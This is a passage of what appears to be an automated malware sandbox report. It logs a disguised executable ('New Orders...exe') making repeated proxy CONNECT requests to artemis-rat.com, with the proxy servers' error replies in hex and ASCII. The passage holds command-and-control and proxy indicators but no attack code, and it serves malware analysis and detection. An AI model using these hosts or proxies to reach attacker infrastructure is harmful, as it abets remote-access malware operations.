                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        164192.168.2.95033162.171.184.9631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.292469978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.960535049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.945255041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.499337912 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        165192.168.2.950320212.31.100.13841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.307028055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        166192.168.2.950451172.67.209.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.308775902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.463361025 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        167192.168.2.950455104.20.103.68807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.310079098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.464402914 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        168192.168.2.950287182.72.203.255807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.310594082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.834005117 CET806INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:17:04 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        169192.168.2.950426209.159.153.19245437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.311417103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.534190893 CET24INHTTP/1.1 403 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        170192.168.2.950296139.99.148.9031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.311779022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.038651943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.116799116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.274127007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.664253950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976608038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.340265036 CET1286INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: squid/3.5.20
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:53 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3711
                                                                                        X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                        X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                        X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                        Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 43 61 63 68 65 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Cache Access Denied</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative C


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        171192.168.2.950469104.16.105.142807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.311933994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.466116905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        172192.168.2.950328186.124.164.213807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.313332081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        173192.168.2.950478104.24.35.152807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.316206932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.470411062 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        174192.168.2.95038172.195.114.16941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.316303015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        175192.168.2.950225124.163.236.5473027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.318010092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.824151993 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        176192.168.2.950355136.244.99.5188887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.320316076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.625071049 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        177192.168.2.950467104.238.111.107537777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.326159000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.788686991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.319932938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.408037901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.492077112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687824011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945472002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
